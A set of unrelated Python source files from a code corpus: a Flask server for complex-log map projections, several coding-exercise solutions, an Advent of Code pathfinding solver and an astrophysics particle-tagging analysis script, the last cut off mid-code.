import LatLng\nfrom source.raster_data.abstract_raster_data_provider import AbstractRasterDataProvider\nfrom source.cache_settings import build_cache_config, make_url_cache_key\nfrom source.raster_data.remote_raster_data_provider import RemoteRasterDataProvider\nfrom source.raster_projector import RasterProjector, TargetSectionDescription\nfrom source.smoothing_functions import CosCutoffSmoothingFunction, AbstractSmoothingFunction, DualCosSmoothingFunction\nfrom source.raster_data.tile_resolver import TileURLResolver\nfrom PIL import Image\nfrom source.flat_tiling import FlatTiling\nfrom server_timing import Timing\nimport numpy as np\n\napp = Flask(__name__)\nlogging.basicConfig(level=logging.INFO)\napp.config.from_mapping(build_cache_config())\ncache = Cache(app)\nCORS(app)\nt = Timing(app,force_debug=True)\n\nfrom source.hard_coded_providers import get_providers\n\nproviders = get_providers()\n\n\ndef do_projection(lat1, lng1, lat2, lng2, data_source: AbstractRasterDataProvider, pixel_width=256, pixel_height=256,\n xmin=-1, xmax=1, ymin=-1,\n ymax=1,\n cutoff=math.pi / 6,\n smoothing=CosCutoffSmoothingFunction,\n fileformat='png'\n ):\n with t.time(\"setup\"):\n trange = TargetSectionDescription(xmin, xmax, pixel_width, ymin, ymax, pixel_height)\n c1 = LatLng(lat1, lng1)\n c2 = LatLng(lat2, lng2)\n proj = ComplexLogProjection(c1, c2, cutoff,\n smoothing_function_type=smoothing)\n projector = RasterProjector(proj, data_source)\n\n with t.time(\"projection\"):\n d = projector.project(trange)\n with t.time(\"parse_result\"):\n pilim = Image.fromarray(d)\n with 
t.time(\"convert_to_format\"):\n        img_io = BytesIO()\n        pilim.save(img_io,fileformat)\n        img_io.seek(0)\n    return send_file(img_io, mimetype='image/'+fileformat)\n\n\n# sample http://127.0.0.1:5000/projection/lat1/10.0/lng1/10.0/lat2/0.0/lng2/0.0.png\n@app.route(\n    \"/projection/lat1/<float:lat1>/lng1/<float:lng1>/\" +\n    \"lat2/<float:lat2>/lng2/<float:lng2>.png\")\n\ndef projection(lat1, lng1, lat2, lng2):\n    additional_dict = parse_request_args(request.args)\n    additional_dict.update(parse_angle(request.args))\n    data_source = parse_source(request.args)\n    return do_projection(lat1, lng1, lat2, lng2, data_source, **additional_dict)\n\n\ntiling = FlatTiling(3 * math.pi)\n\n\n@app.route(\n    \"/tile/lat1/<float:lat1>/lng1/<float:lng1>/\" +\n    \"lat2/<float:lat2>/lng2/<float:lng2>/cutoff/<float:cutoff>/smoothing/<string:smoothing>/<int:zoom>/<int:x>/<int:y>.<string:fileformat>\")\n@cache.cached(timeout=60*60*24*7,key_prefix=make_url_cache_key)\ndef tile(lat1, lng1, lat2, lng2, cutoff, smoothing, zoom, x, y,fileformat):\n    allowed_formats = [\"png\",\"webp\"]\n    if fileformat not in allowed_formats:\n        return \"file format needs to be of type \" + str(allowed_formats), 400\n    xmin, ymin, xmax, ymax = tiling(x, y, zoom)\n    ad = {}\n    logging.info(\"Rendering tile with ({0},{1}) to ({2},{3})\".format(xmin, ymin, xmax, ymax))\n    source = parse_source(request.args)\n\n    for i in range(5):\n        try:\n            projected = do_projection(lat1, lng1, lat2, lng2, source, xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax,cutoff= math.radians(cutoff),smoothing=parse_smoothing(smoothing),fileformat=fileformat)\n            return projected\n        except ConnectionError as e:\n            logging.warning(e)\n\n    logging.warning(request.url +\" \"+ str(request.args) + \"could not be resolved!\")\n    return \"\" ,500\n\n\n@app.route(\n    \"/resolve/lat1/<float:lat1>/lng1/<float:lng1>/\" +\n    \"lat2/<float:lat2>/lng2/<float:lng2>/cutoff/<float:cutoff>/smoothing/<string:smoothing>\"+\n    \"/clickLat/<float:clickLat>/clickLng/<float:clickLng>.json\")\ndef resolve(lat1, lng1, lat2, lng2, cutoff, smoothing, clickLat, clickLng):\n    proj = ComplexLogProjection(LatLng(lat1, lng1), LatLng(lat2, lng2), math.radians(cutoff),\n                                smoothing_function_type=parse_smoothing(smoothing))\n\n    x, y = tiling.from_leaflet_LatLng(LatLng(clickLat, clickLng))\n\n    xy = np.array([[x], [y]])\n    latlng_data = proj.invert(xy)\n\n\n    assert latlng_data.shape == (2, 1)\n    ret_data = {\"lat\": latlng_data[0, 0], \"lng\": latlng_data[1, 0]}\n    response = app.response_class(\n        response=json.dumps(ret_data),\n        status=200,\n        mimetype='application/json'\n    )\n    response.headers.add('Access-Control-Allow-Origin', '*')\n    response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n    response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n    return response\n\n\n@app.route(\n    \"/from_leaflet/lat1/<float:lat1>/lng1/<float:lng1>/\" +\n    \"lat2/<float:lat2>/lng2/<float:lng2>/cutoff/<float:cutoff>/smoothing/<string:smoothing>.json\",methods=['POST', 'GET'])\n@cross_origin(origin='*',headers=['access-control-allow-origin','Content-Type'])\ndef from_leaflet(lat1, lng1, lat2, lng2, cutoff, smoothing):\n\n    if request.method != \"POST\":\n        return \"\"\n\n    json_i = request.get_json(force=True)\n    if json_i is None:\n        return \"Could not parse JSON\",500\n\n\n\n    proj = ComplexLogProjection(LatLng(lat1, lng1), LatLng(lat2, lng2), math.radians(cutoff),\n                                smoothing_function_type=parse_smoothing(smoothing))\n\n    elements = json_i['data']\n    ret_v = []\n    for e in elements:\n        x, y = tiling.from_leaflet_LatLng(LatLng(e['lat'], e['lng']))\n        xy = np.array([[x], [y]])\n        latlng_data = proj.invert(xy)\n        assert latlng_data.shape == (2, 1)\n        ret_element = {\"lat\": latlng_data[0, 0], \"lng\": latlng_data[1, 0]}\n        ret_v.append(ret_element)\n    response = app.response_class(\n        response=json.dumps({\"data\":ret_v}),\n        status=200,\n        mimetype='application/json'\n    )\n\n    
return response\n\n\n@app.route(\n    \"/to_leaflet/lat1/<float:lat1>/lng1/<float:lng1>/\" +\n    \"lat2/<float:lat2>/lng2/<float:lng2>/cutoff/<float:cutoff>/smoothing/<string:smoothing>.json\",methods=['POST', 'GET'])\n@cross_origin()\ndef to_leaflet(lat1, lng1, lat2, lng2, cutoff, smoothing):\n\n    if request.method != \"POST\":\n        return \"\"\n\n    json_i = request.get_json(force=True)\n    if json_i is None:\n        return \"Could not parse JSON\",500\n\n    precision = int(request.args.get(\"precision\",5)) # number of digits\n    c1latlng = LatLng(lat1, lng1)\n    c2latlng = LatLng(lat2, lng2)\n\n    proj = ComplexLogProjection(c1latlng,c2latlng , math.radians(cutoff),\n                                smoothing_function_type=parse_smoothing(smoothing))\n\n    center_distance = c1latlng.distanceTo(c2latlng)\n    pixel_per_m = 256.0/(156412.0)\n    elements = json_i['data']\n    ret_v = []\n    for e in elements:\n        xy = np.array([[e[0]], [e[1]]])\n        xy,clipping = proj(xy,calculate_clipping=True)\n        z = proj.getZoomLevel(xy,pixel_per_m)\n        latlng = tiling.to_leaflet_LatLng(xy[0,0],xy[1,0])\n\n        clipping = bool(clipping[0])\n\n        ret_element = [ round(latlng.lat,precision), round(latlng.lng,precision),round(z[0],precision),clipping]\n        ret_v.append(ret_element)\n\n    z_values = list(map(lambda x:x[2],ret_v))\n    min_z = min(*z_values)\n    max_z = max(*z_values)\n    response = app.response_class(\n        response=json.dumps({\"data\":ret_v,\"min_z\":min_z,\"max_z\":max_z},check_circular=False,indent=None),\n        status=200,\n        mimetype='application/json'\n    )\n\n    return response\n\ndef get_cities():\n\n    cities_cache_key = \"cities_cache_key\"\n    with t.time(\"checking_cities_cache\"):\n        cached_v = cache.get(cities_cache_key)\n        if cached_v is not None:\n            with t.time(\"loading_cities_cache\"):\n                return cached_v\n\n    with t.time(\"loading_cities_from_file\"):\n        cities_path = os.path.join(os.path.dirname(__file__),'..',\"cities.json\")\n        with open(cities_path,'rb') as f:\n            cities_parsed = json.load(f)\n\n        named_cities = list(filter(lambda x:\"name\" in x['tags'],cities_parsed['elements']))\n\n        cities_parsed['elements'] = list(map(lambda x:{\n            \"lat\":x['lat'],\n            \"lon\":x['lon'],\n            \"type\":x['type'],\n            \"tags\":{\n                \"name\":x[\"tags\"][\"name\"],\n                \"population\":x['tags'].get(\"population\",0),\n                \"place\":x['tags']['place']\n            }\n        },named_cities))\n    with t.time(\"writing_cities_to_cache\"):\n        cache.set(cities_cache_key,cities_parsed)\n    return cities_parsed\n\n\n@app.route('/cities.json',methods=[\"GET\"])\n@cache.cached(timeout=60*60)\ndef cities():\n    cities_static_string = json.dumps(get_cities(), check_circular=False)\n    return app.response_class(\n        response=cities_static_string,\n        status=200,\n        mimetype='application/json'\n    )\n\n\n\n\n\n@app.route(\n    \"/cities_projected/lat1/<float:lat1>/lng1/<float:lng1>/\" +\n    \"lat2/<float:lat2>/lng2/<float:lng2>/cutoff/<float:cutoff>/smoothing/<string:smoothing>.json\",methods=['POST', 'GET'])\n@cross_origin()\n@cache.cached(timeout=60*60*24,key_prefix=make_url_cache_key)\ndef cities_projected(lat1, lng1, lat2, lng2, cutoff, smoothing):\n\n    with t.time(\"loading_cities_lat_lng\"):\n        cities_lat_lng = np.array(list(map(lambda e: [e['lat'], e['lon']], get_cities()['elements']))).transpose()\n    with t.time(\"parsing_params\"):\n        precision = int(request.args.get(\"precision\",5)) # number of digits\n        c1latlng = LatLng(lat1, lng1)\n        c2latlng = LatLng(lat2, lng2)\n\n        proj = ComplexLogProjection(c1latlng,c2latlng , math.radians(cutoff),\n                                    smoothing_function_type=parse_smoothing(smoothing))\n\n        center_distance = c1latlng.distanceTo(c2latlng)\n        pixel_per_m = 256.0/(156412.0)\n        num_cities = cities_lat_lng.shape[1]\n\n    with t.time(\"projection\"):\n        xy,clipping = proj(cities_lat_lng,calculate_clipping=True)\n    with 
t.time(\"zoomlevel\"):\n        z = proj.getZoomLevel(xy, pixel_per_m)\n    with t.time(\"tiling\"):\n        latlngs = [None] * num_cities\n        for i in range(num_cities):\n\n            latlng = tiling.to_leaflet_LatLng(xy[0,i],xy[1,i])\n            latlngs[i]=latlng\n    with t.time(\"packaging\"):\n        ret_v = [None] * num_cities\n        p_x_int = 10**precision\n        p_x_float = 10.**precision\n        my_round = lambda x:int(x*(p_x_int))/(p_x_float)\n        for i in range(num_cities):\n            clipping_v = bool(clipping[i])\n            latlng = latlngs[i]\n            ret_element = [ my_round(latlng.lat), my_round(latlng.lng),my_round(z[i]),clipping_v]\n            ret_v[i] =ret_element\n\n    with t.time(\"assembly\"):\n        z_values = list(map(lambda x:x[2],ret_v))\n        min_z = min(*z_values)\n        max_z = max(*z_values)\n        response = app.response_class(\n            response=json.dumps({\"data\":ret_v,\"min_z\":min_z,\"max_z\":max_z},check_circular=False,indent=None),\n            status=200,\n            mimetype='application/json'\n        )\n    return response\n\n@app.route(\"/providers\")\ndef fetch_providers():\n    p = get_providers()\n    out_dict ={}\n    for prov_name,prov_data in p.items():\n        if isinstance(prov_data,RemoteRasterDataProvider):\n            prov_data_r : RemoteRasterDataProvider = prov_data\n            res:TileURLResolver = prov_data_r.resolver\n\n            out_dict[prov_name] =res.normalized()\n\n    response = jsonify(out_dict)\n    return add_cors_headers(response)\n\ndef parse_request_args(args: request) -> Dict:\n    additional_dict = {}\n    if 'width' in args:\n        additional_dict['pixel_width'] = int(args['width'])\n\n    if 'height' in args:\n        additional_dict['pixel_height'] = int(args['height'])\n\n    if 'sizex' in args:\n        v = float(args['sizex'])\n        additional_dict['xmin'] = -v\n        additional_dict['xmax'] = v\n\n    if 'sizey' in args:\n        v = float(args['sizey'])\n        additional_dict['ymin'] = -v\n        additional_dict['ymax'] = v\n\n    return additional_dict\n\n\ndef parse_angle(args) -> Dict:\n    additional_dict = {}\n    # cutoff is provided as degree\n    if 'cutoff' in args:\n        v = abs(float(args['cutoff']) * math.pi / 180)\n        additional_dict['cutoff'] = v\n\n    return additional_dict\n\ndef parse_source(args) -> AbstractRasterDataProvider:\n    data_source = providers.get(\"default\", None)\n    if 'source' in args:\n        v = args['source']\n        if v not in providers:\n            return abort(Response(\"invalid source\"))\n        data_source = providers.get(v, None)\n\n    if data_source is None:\n        abort(Response(\"No data source set\"))\n    return data_source\n\ndef parse_smoothing(smoothing) -> Type[AbstractSmoothingFunction]:\n    types = {\n        \"cos\":CosCutoffSmoothingFunction,\n        \"dualcos\":DualCosSmoothingFunction\n    }\n\n    if smoothing in types:\n        return types[smoothing]\n\n    raise Exception(\"Invalid smoothing type \" + smoothing)\n\n\n\n@app.route('/test')\ndef test():\n    args = request.args\n    return json.dumps(args.to_dict())\n\n\ndef add_cors_headers(response):\n    response.headers.add('Access-Control-Allow-Origin', '*')\n    response.headers.add('Access-Control-Allow-Headers', '*')\n    response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n    return response","repo_name":"saildeep/master_backend","sub_path":"source/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":13860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32518597929","text":"#!/usr/bin/env python2.7\n\n\n'''\nGiven a positive integer n, find the least number of\nperfect square numbers (for example, 1, 4, 9, 16, ...) 
which sum to n.\n\nFor example, given n = 12, return 3 because 12 = 4 + 4 + 4; given n = 13, return 2 because 13 = 4 + 9.\n'''\n\nimport math\n\nclass Solution(object):\n    def num_of_squares(self, n):\n        while n % 4 == 0:\n            n /= 4\n        if n % 8 == 7:\n            return 4\n        a = 0\n        while a*a <= n:\n            b = int(math.sqrt(n - a*a))\n            if a*a + b*b == n:\n                if a > 0 and b > 0:\n                    return 2\n                else:\n                    return 1\n            a += 1\n        return 3","repo_name":"fifa007/Leetcode","sub_path":"src/perfect_squares.py","file_name":"perfect_squares.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33255133464","text":"import jinja2\n\n\nclass TextModel:\n    \n    def __init__(self) -> None:\n        self.template_path = None\n\n    def text_model(self) -> str:\n        ret_val = \"\"\n        try:\n            templateLoader = jinja2.FileSystemLoader(searchpath=\"./\")\n            templateEnv = jinja2.Environment(loader=templateLoader)\n            t = templateEnv.get_template(self.template_path)\n            ret_val = t.render(model=self)\n        except Exception as ex:\n            print(ex)\n\n        return ret_val","repo_name":"rodusek-v/gui-tad","sub_path":"gui/model/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73834925173","text":"class Solution:\n    def lengthOfLongestSubstring(self, s: str) -> int:\n        left, right, answer = 0, 0, -1\n        ans = set()\n        for right in range(len(s)):\n            while s[right] in ans:\n                ans.remove(s[left])\n                left += 1\n            ans.add(s[right])\n            answer = max(answer, right - left + 1)\n\n        if answer == -1:\n            return 0\n        return answer","repo_name":"kalmad99/CompetitiveProgramming","sub_path":"Week 9/longestSubstringWithoutRepeatingCharacters.py","file_name":"longestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29018569165","text":"class Ninja:\n    def __init__(self, first_name, last_name ,treats, pet_food, pet):\n        self.first_name = first_name\n        self.last_name = last_name\n        self.treats = treats\n        self.pet_food = pet_food\n        self.pet = pet\n\n    # walk() - walks the ninja's pet invoking the pet play() method\n    def walk(self):\n        self.pet.play()\n\n        return\n\n\n    # feed() - feeds the ninja's pet invoking the pet eat() method\n    def feed(self):\n        self.pet.eat()\n\n        return\n\n\n    # bathe() - cleans the ninja's pet invoking the pet noise() method\n    def bathe(self):\n        self.pet.noise()\n\n        return\n\n\n\n\n\nclass Pet:\n    def __init__(self, name , pet_type , tricks, sound):\n        self.name = name\n        self.type = pet_type\n        self.tricks = tricks\n        self.energy = 10\n        self.health = 10\n        self.sound = sound\n\n\n    # sleep() - increases the pets energy by 25\n    def sleep(self):\n        self.energy += 25\n        print(self.energy)\n\n        return \n\n    # eat() - increases the pet's energy by 5 & health by 10\n    def eat(self):\n        self.energy += 5\n        self.health += 10\n        print(self.name+\"'s health rose to \"+str(self.health)+\" and energy rose to \"+str(self.energy)+\"!\")\n\n        return\n\n    # play() - increases the pet's health by 5\n    def play(self):\n        self.health += 5\n        print(self.name+\"'s health rose to \" + str(self.health) + \"!\")\n\n        return\n\n    # noise() - prints out the pet's sound\n    def noise(self):\n        print(self.sound)\n\n        return\n\n\n# end of classes\n\n\n# instances\n\nrover = Pet(\"Rover\", \"Dog\", [\"Fetch\", \"Roll over\"], \"Woof!\")\nseven = Ninja(\"Seven\", \"Six\", \"cookies\", 
\"dry food\", rover)\n\nseven.feed()\nseven.bathe()\nseven.walk()","repo_name":"bennett33/Dojo_Pets","sub_path":"dojo_pets.py","file_name":"dojo_pets.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18029897640","text":"from random import randint\nm = [] # declare the array\nlen = int(input('enter len: ')) # ask the user for the array length\nfor i in range(0, len): # generate random numbers until the user-specified length is reached\n    i = randint(0, 10000) / 10\n    m.append(i)\nmaximum = m.index(max(m)) # find the index of the maximum element in the array\nfor x in m:\n    if m.index(x) > maximum:\n        m[m.index(x)] = 0 # if an element's index is greater than the maximum's, zero it out\nprint(m) # result","repo_name":"dasha0452/homework3","sub_path":"dasha.py","file_name":"dasha.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40204834462","text":"from aocd import get_data, submit\n\n################################################################################\n# Parse input\n\nGRID = get_data(day=12, year=2022).split(\"\\n\")\nWIDTH = len(GRID[0])\nHEIGHT = len(GRID)\n# Touch every square once plus one, should be impossible to be a \"shortest path\"\nINFINITY = (WIDTH * HEIGHT) + 1\n\n################################################################################\n# Helper Function\n\n\ndef valid_directions(x, y):\n    directions = []\n\n    max_value = GRID[y][x] + 1\n\n    if y > 0 and max_value >= GRID[y - 1][x]:\n        directions.append((0, -1))\n    if y < HEIGHT - 1 and max_value >= GRID[y + 1][x]:\n        directions.append((0, 1))\n    if x > 0 and max_value >= GRID[y][x - 1]:\n        directions.append((-1, 0))\n    if x < WIDTH - 1 and max_value >= GRID[y][x + 1]:\n        directions.append((1, 0))\n    return directions\n\n\ndef dijkstra_multiple_targets(graph, source, targets):\n    # Thanks Wikipedia, my memory is not what it used to be:\n    # https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Pseudocode\n    unseen_targets = set(targets)\n    dist = {}\n    prev = {}\n    queue = []\n    for v in graph.keys():\n        dist[v] = INFINITY\n        prev[v] = None\n        queue.append(v)\n    dist[source] = 0\n\n    while len(queue):\n        u = min(queue, key=lambda x: dist[x])\n\n        if u in targets:\n            unseen_targets.remove(u)\n            if len(unseen_targets) == 0:\n                return min([dist[t] for t in targets])\n\n        # delete u from queue\n        del queue[queue.index(u)]\n\n        for v in graph[u]:\n            if v not in queue:\n                continue\n            alt = dist[u] + 1\n            if alt < dist[v]:\n                dist[v] = alt\n                prev[v] = u\n\n    return None\n\n\n################################################################################\n# Build data structures\n\nstart = None\nend = None\nfor y, row in enumerate(GRID):\n    x = row.find(\"S\")\n    if x != -1:\n        start = (x, y)\n        GRID[y] = row.replace(\"S\", \"a\")\n\n    x = row.find(\"E\")\n    if x != -1:\n        end = (x, y)\n        GRID[y] = row.replace(\"E\", \"z\")\n\n    if start and end:\n        break\n\nfor i, row in enumerate(GRID):\n    GRID[i] = list(map(ord, row))\n\nGRID[start[1]][start[0]] = ord(\"a\")\nGRID[end[1]][end[0]] = ord(\"z\")\n\n# Invert the graph and compute all paths back from the target to all sources\n# This lets us solve A and B using the same code\ninverted_graph = {}\nstarting_points = [] # For part B\nfor y in range(HEIGHT):\n    for x in range(WIDTH):\n        if GRID[y][x] == ord(\"a\"):\n            starting_points.append((x, y))\n        # pre-populate all vertices (otherwise, use a 
defaultdict)\n inverted_graph[(x, y)] = []\n\nfor y in range(HEIGHT):\n for x in range(WIDTH):\n for direction in valid_directions(x, y):\n inverted_graph[(x + direction[0], y + direction[1])].append((x, y))\n\n\nsubmit(\n dijkstra_multiple_targets(inverted_graph, end, [start]),\n part=\"a\",\n day=12,\n year=2022,\n)\nsubmit(\n dijkstra_multiple_targets(inverted_graph, end, starting_points),\n part=\"b\",\n day=12,\n year=2022,\n)\n","repo_name":"dmaljovec/advent_of_code","sub_path":"2022/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40251285377","text":"class Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n self.result = []\n self.combinations([], 0, 0, candidates, target)\n return self.result\n\n def combinations(self, path, index, total, candidates, target):\n if total > target:\n return\n if total == target:\n self.result.append(path)\n return\n for i in range(index, len(candidates)):\n self.combinations(path+[candidates[i]], i, total+candidates[i], candidates, target)","repo_name":"Naboni/Competitive-Programming","sub_path":"combinationSum.py","file_name":"combinationSum.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16120422489","text":"# © Shahram Talei @ 2020 The University of Alabama - All rights reserved.\n#you can redistribute it and/or modify\n#it under the terms of the GNU General Public License as published by\n#the Free Software Foundation; either version 3 of the License, or\n#(at your option) any later version.\n#You should have received a copy of the GNU General Public License\n#along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n\nimport h5py as h5\nimport numpy as np\nfrom matplotlib.legend_handler import HandlerLine2D\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport argparse\nimport math\n#import csv\n#How to use: $python AccretionV2.py HDf_tag_file FirstTagged galaxies_file merger_tree\n#example: python TagAnalysis.py StellarHalo.h5 FirstTagged.h5 gals.ascii trees_264_000\n#This works for a single halo/galaxy\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"TagFile\", type=str)\n    parser.add_argument(\"FirstTag\", type=str)\n    parser.add_argument(\"GalFile\", type=str)\n    parser.add_argument(\"MergerTree\", type=str)\n    args = parser.parse_args()\n    #f=h5.File(\"StellarHalo.h5\",\"r\")\n    TagFF=h5.File(args.TagFile,\"r\")\n    TagIF=h5.File(args.FirstTag,\"r\")\n    #extract halos in a specific mass range, MWish for instance\n    LowerMass=1.0e12\n    UpperMass=1.3e12\n    NBins=6\n    #\n    # Galaxies\n    Gals=np.genfromtxt(args.GalFile, delimiter = ',')\n    Gx0=np.array(Gals[:,0])\n    Gy0=np.array(Gals[:,1])\n    Gz0=np.array(Gals[:,2])\n    GMv0=np.array(Gals[:,3])\n    GRv0=np.array(Gals[:,4])\n    GRd0=np.array(Gals[:,5])\n    GSnap=np.array(Gals[:,6])\n    datasetNames = [n for n in TagFF.keys()]\n    for n in datasetNames:\n        print(n)\n    #Tagged Particles\n    ####################################\n    #Final Tag\n    TagsF=TagFF['FinalTag'] # for full tag\n    #halo=f['FullTag'] # for individual tags\n    IDF0=TagsF['PID']\n    ageF0=TagsF['Age']\n    StellarMassF0=TagsF['StellarMass']\n    metallicityF0=TagsF['ZZ']\n    print(TagsF.shape)\n    xF0=TagsF['X']\n    yF0=TagsF['Y']\n    zF0=TagsF['Z']\n    MvF0=TagsF['Mvir']\n    HindexF0=TagsF['HaloIndex']\n    BEF0=TagsF['BindingEnergy']\n    TreeIndexF0=TagsF['TreeIndex']\n    infallMvirF0=TagsF['LastMajorMerger']\n    SnapF0=TagsF['Snap']\n    #\n    IDF=IDF0[BEF0!=0]\n    ageF=ageF0[BEF0!=0]\n    StellarMassF=StellarMassF0[BEF0!=0]*(1.0e10)\n    metallicityF=metallicityF0[BEF0!=0]/0.0134\n    xF=xF0[BEF0!=0]\n    yF=yF0[BEF0!=0]\n    zF=zF0[BEF0!=0]\n    MvF=MvF0[BEF0!=0]\n    HindexF=HindexF0[BEF0!=0]\n    TreeIndexF=TreeIndexF0[BEF0!=0]\n    UTree = set(TreeIndexF)\n    infallMvirF=infallMvirF0[BEF0!=0]\n    #print(\"TreeIndex:%d out of %d\"%(len(UTree),len(TreeIndex0)))\n    #print(UTree)\n    ##Extract particles for this specific halo/galaxy\n    #halo\n    #dx2=(xh-x)**2.\n    #dy2=(yh-y)**2.\n    #dz2=(zh-z)**2.\n    #the main galaxy\n    #################\n    #First tagged\n    TagsI=TagIF['FirstTagged'] # for full tag\n    #halo=f['FullTag'] # for individual tags\n    IDI0=TagsI['PID']\n    ageI0=TagsI['Age']\n    StellarMassI0=TagsI['StellarMass']\n    metallicityI0=TagsI['ZZ']\n    print(TagsI.shape)\n    xI0=TagsI['X']\n    yI0=TagsI['Y']\n    zI0=TagsI['Z']\n    MvI0=TagsI['Mvir']\n    HindexI0=TagsI['HaloIndex']\n    BEI0=TagsI['BindingEnergy']\n    TreeIndexI0=TagsI['TreeIndex']\n    infallMvirI0=TagsI['LastMajorMerger']\n    SnapI0=TagsI['Snap']\n    #\n    IDI=IDI0[BEI0!=0]\n    ageI=ageI0[BEI0!=0]\n    StellarMassI=StellarMassI0[BEI0!=0]#*(1.0e10) it is already converted in PtagPP\n    metallicityI=metallicityI0[BEI0!=0]/0.0134\n    xI=xI0[BEI0!=0]\n    yI=yI0[BEI0!=0]\n    zI=zI0[BEI0!=0]\n    MvI=MvI0[BEI0!=0]\n    HindexI=HindexI0[BEI0!=0]\n    TreeIndexI=TreeIndexI0[BEI0!=0]\n    UTree3 = set(TreeIndexI)\n    infallMvirI=infallMvirI0[BEI0!=0]\n    SnapI=SnapI0[BEI0!=0]\n    ##########################\n    # The main galaxy\n    S=SnapF0[0]\n    GMx0=Gx0[GSnap==S]\n    GMy0=Gy0[GSnap==S]\n    GMz0=Gz0[GSnap==S]\n    GMMv0=GMv0[GSnap==S]\n    GMRv0=GRv0[GSnap==S]\n    GMRd0=GRd0[GSnap==S]\n    Gx=GMx0[(GMv0>LowerMass) & (GMv0<UpperMass)]\n    Gy=GMy0[(GMv0>LowerMass) & (GMv0<UpperMass)]\n    Gz=GMz0[(GMv0>LowerMass) & (GMv0<UpperMass)]\n    GMv=GMMv0[(GMv0>LowerMass) & (GMv0<UpperMass)]\n    GRv=GMRv0[(GMv0>LowerMass) & (GMv0<UpperMass)]\n    GRd=GMRd0[(GMv0>LowerMass) & (GMv0<UpperMass)]
\n    Rin) & (rRin) & (r>0.0) & (r<0.1)]\n        Z[i]=np.sum(metalBin)#/len(metalBin)\n    #ax02=fig0.add_subplot(222)\n    print(pMetallicity)\n    print(\"z30:\")\n    print(Z)\n    #if not(math.isnan(met)):\n    #ax02.plot(np.log10(Mvh[i]),np.log10(met))\n    #print(met)\n    ########\n    #\n    # get totals for different halos\n    #min=np.min(Hindex)\n    #max=np.max(Hindex)\n    #print(min,max)\n    print(len(x))\n    print(len(StellarMass[StellarMass !=0]))\n    #min max didn't work so let's find another way to get the total properities\n    #checking power law distribution\n    #\n    #\n    fig0=plt.figure(0)\n    ax01=fig0.add_subplot(221)\n    ax01.plot(np.log10(Rs),np.log10(Rho))\n    ax01.set_xlabel(\"$log(R(kpc))$\")\n    ax01.set_ylabel(\"$log(\\\\rho) [M_\\\\odot /kpc^{-3}]$\")\n    ax02=fig0.add_subplot(222)\n    ax02.hist(pAge,linewidth=2, bins=10, log=False,cumulative=False, histtype='step', alpha=0.9,color='blue',label='age')\n    ax02.set_xlabel(\"Age\")\n    ax03=fig0.add_subplot(223)\n    ax03.hist(pMetallicity,linewidth=2, bins=10, log=False,cumulative=False, histtype='step', alpha=0.9,color='blue',label='metallicity')\n    ax03.set_xlabel(\"Metallicity$(Z/Z_{\\\\odot})$\")\n    ax04=fig0.add_subplot(224)\n    ax04.plot(Rs,Z)\n    #for i in range(0,len(Idh)):\n\n    #\n    #metalicity-halo mass dependence\n    #metalicity of the halo is the average metalicity\n    #\n\n    print(GMv,GRv,GRd)\n    print(np.sum(pStellarMass))\n    # #\n    #\n    fig1 = plt.figure(figsize=plt.figaspect(1))\n    ax = fig1.add_subplot(111, projection='3d')\n    ax.scatter(px,py,pz,c='black',alpha=0.8,marker='.',s=1)\n    #\n    ax.set_xlabel('X (Mpc)')\n    ax.set_ylabel('Y (Mpc)')\n    ax.set_zlabel('Z (Mpc)')\n    #\n    fig2 = plt.figure(2,figsize=plt.figaspect(1))\n    ax2 = fig2.add_subplot(111)#, projection='3d')\n    ax2.plot(px[pTreeIndex!=0],pz[pTreeIndex!=0],'k.', markersize=1)\n    #fig.set_size_inches(14,8)\n    ax2.set_xlabel('X (Mpc)')\n    ax2.set_ylabel('Z (Mpc)')\n    #ax.set_zlabel('Z (kpc)')\n    # just pick a small area to test color-map\n    #x_2=x[x>17]\n    #z_2=z[x>17]\n    #mass_2=mass[x>17]\n    #x_new=x_2[x_2<19]\n    #z_new=z_2[x_2<19]\n    #mass_new=mass_2[x_2<19]\n    #mass_new=mass_new.reshape(len(x_new),len(z_new))\n    #X, Z =np.meshgrid(x_new,z_new)\n    #fig3, ax3=plt.subplots()\n    fig3= plt.figure(3,figsize=plt.figaspect(1))\n    #ax3=fig3.add_subplot(111)\n    #ax3.contour(X,Z,mass_new)\n    #viridis = cm.get_cmap('viridis', 256)#np.max(mass_new))\n    #psm=ax3.pcolormesh([x_new,z_new],cmap=viridis, rasterized=True)\n    #fig3.colorbar(psm,ax=ax3)\n    #plot cmap = 'RdPu'\n    plt.scatter(px,pz , c=np.log10(pMetallicity),cmap = 'gist_earth', s =2, alpha =0.9)\n    cbar = plt.colorbar()\n    plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n    plt.title(\"metallicity 